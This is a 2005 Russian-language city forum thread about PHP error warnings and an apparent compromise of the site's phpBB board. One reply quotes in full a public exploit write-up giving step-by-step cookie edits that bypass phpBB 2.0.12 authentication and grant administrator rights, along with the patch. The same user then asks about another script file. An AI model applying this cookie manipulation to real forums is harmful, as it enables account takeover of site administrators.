Вернуться   Форумы города Луги > Интернет в городе > Общие вопросы

Ответ
 
Опции темы Опции просмотра
Старый 21.04.2005, 14:23   #11
SERGEY
Новозеландец
 
Аватар для SERGEY
 
Регистрация: 16.07.2004
Адрес: New Zealand
Сообщений: 3,160
SERGEY на пути к лучшему
Отправить сообщение для SERGEY с помощью ICQ Отправить сообщение для SERGEY с помощью MSN
По умолчанию Что это значит???

ну ну я пытался а он мне такое написал короче просто послали на Х
__________________
i don't take chit from any one
SERGEY вне форума   Ответить с цитированием
Старый 21.04.2005, 14:31   #12
SERGEY
Новозеландец
 
Аватар для SERGEY
 
Регистрация: 16.07.2004
Адрес: New Zealand
Сообщений: 3,160
SERGEY на пути к лучшему
Отправить сообщение для SERGEY с помощью ICQ Отправить сообщение для SERGEY с помощью MSN
По умолчанию Что это значит???

Warning: copy(./images/avatars/10331233674267808720172.gif): failed to open stream: Permission denied in /usr/www/center/data/phpBB2/includes/usercp_avatar.php on line 239

Warning: Cannot modify header information - headers already sent by (output started at /usr/www/center/data/phpBB2/includes/usercp_avatar.php:239) in /usr/www/center/data/phpBB2/includes/page_header.php on line 475

Warning: Cannot modify header information - headers already sent by (output started at /usr/www/center/data/phpBB2/includes/usercp_avatar.php:239) in /usr/www/center/data/phpBB2/includes/page_header.php on line 477

Warning: Cannot modify header information - headers already sent by (output started at /usr/www/center/data/phpBB2/includes/usercp_avatar.php:239) in /usr/www/center/data/phpBB2/includes/page_header.php on line 478
вот так то Лелик это что такое и как сним таго покончить.
__________________
i don't take chit from any one
SERGEY вне форума   Ответить с цитированием
Старый 22.04.2005, 16:10   #13
Вероника
Местный
 
Аватар для Вероника
 
Регистрация: 27.09.2004
Адрес: Подмосковье
Сообщений: 1,164
Вероника на пути к лучшему
Отправить сообщение для Вероника с помощью ICQ
По умолчанию Что это значит???

Верните мою аватарку!!!!!!!!!!!
__________________
Мышки плакали, кололись, но продолжали жрать кактус
Вероника вне форума   Ответить с цитированием
Старый 24.04.2005, 14:00   #14
Alex
Супер-модератор
 
Аватар для Alex
 
Регистрация: 29.11.2002
Адрес: Заклинье
Сообщений: 1,381
Alex отключил(а) отображение уровня репутации
По умолчанию Что это значит???

Читаем здесь...
http://www.phorum.luga.ru/viewtopic.php?t=1044
__________________
Мы все умрём...
Alex вне форума   Ответить с цитированием
Старый 26.04.2005, 18:21   #15
ELF
Местный
 
Регистрация: 26.04.2005
Сообщений: 165
ELF на пути к лучшему
Отправить сообщение для ELF с помощью ICQ
По умолчанию Что это значит???

Это... а форум какой версии стоит? судя по написи снизу "Powered by phpBB © 2001, 2002 phpBB Group" не очень то и новая версия... где-то 2.0.6 наверное, если не меньше...
неплохо бы было че-нить типа 2.0.13 поставить... хотя у него тоже дыры есть, которые в начале этого месяца нашли... =))
__________________
Жизнь - странная штука...
ELF вне форума   Ответить с цитированием
Старый 26.04.2005, 18:24   #16
ELF
Местный
 
Регистрация: 26.04.2005
Сообщений: 165
ELF на пути к лучшему
Отправить сообщение для ELF с помощью ICQ
По умолчанию Re: Что это значит???

Цитата:
Сообщение от Alex
И кто это был? Если не секрет...
какая разница кто? это мог сделать любой, прочитав вот это:
Цитата:
Сообщение от exploit
[size=9px]

-----------------------------------

phpBB 2.0.12 Session Handling
Administrator Authentication
Bypass EXPLOIT -SIMPLIFIED-
- By PPC^Rebyte

-----------------------------------

03maa2005

** NEDERLANDSE VERSIE ONDERAAN / DUTCH VERSION BELOW **

[ ENGLISH VERSION ]

*** Status
__________

phpBB has already been informed about this exploit and has released a
'critical update' on 27 februari 2005, however most forums are still running
version 2.0.12 or lower.

VULNERABLE:
- 2.0.x --> 2.0.12

IMMUNE:
- 2.0.13 or newer


1* Intro
________

The discoverer of this bug is unknown, says "Paiserist" who wrote a C exploit
for this bug.

Link to Paisterist's exploit at Packetstormsecurity:
http://packetstormsecurity.org/0503-...phpbbsession.c

This program didn't work as it should on my pc, so I had to find out a way
for myself to exploit the bug manually.
This seemed to be much easier than compiling that C exploit and fool around
with it until it eventually still doesn't work (in my case).
This simplified manual method I'll describe can also be used for Internet
Explorer or other browsers instead of only Mozilla/Firefox.


2* The bug
__________

We're going to edit a cookie so that when you visit a certain forum another
time you will get logged in having admin rights. This is possible due to a
bug in includes/sessions.php
--> if( $sessiondata['autologinid'] == $auto_login_key )


3* Preparation
______________

1. Register at forum?

2. Log in with account
+ UNCHECK "Log in automatically"

3. Close browser to be sure a cookie is made.

4. Locate cookie
*firefox: X:\Documents and Settings\Name\Application
Data\Mozilla\Firefox\Profiles\profile.default\cook ies.txt
--> search the .txt for the domainname (domain.tld)
--> default cookiename = phpbbmysql
*iexplorer: X:\Documents and Settings\Name\Cookies\Name@domain.tld
--> default cookiename = phpbbmysql

4* Let's Xploit!
________________

Open the cookie in a text editor and search a line that resembles:

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%2 2%22%3B
s%3A6%3A%22userid%22%3Bs%3A1%3A%22X%22%3B%7D

|
[ your 'user id' ] ____|

Replace this with:

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

|
[ 2 = 'user id' of admin ] ____|

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

Save cookie and close.
Open your browser and surf to forum.

You'll now be automatically logged in having admin right


5* Solution
___________

* Update phpBB to version 2.0.13

- or -

* in "includes/sessions.php" replace code:

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

if( $sessiondata['autologinid'] == $auto_login_key )

replace with:

if( $sessiondata['autologinid'] === $auto_login_key )

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


6* Outro
________

THE.END

Greetings 2 everyone at Rebyte and the whole Belgian scene !!
Additional greetings 2 Paisterist for the original C exploit !

-- PPC^Rebyte --
-- ppc@respected.as --


+++++++++++++++++++++++++++++

[/size]
__________________
Жизнь - странная штука...
ELF вне форума   Ответить с цитированием
Старый 26.04.2005, 18:27   #17
ELF
Местный
 
Регистрация: 26.04.2005
Сообщений: 165
ELF на пути к лучшему
Отправить сообщение для ELF с помощью ICQ
По умолчанию Что это значит???

кстати, а downloads.php у вас есть?

__________________
Жизнь - странная штука...
ELF вне форума   Ответить с цитированием
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Часовой пояс GMT +4, время: 22:42.


Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd. Перевод: zCarot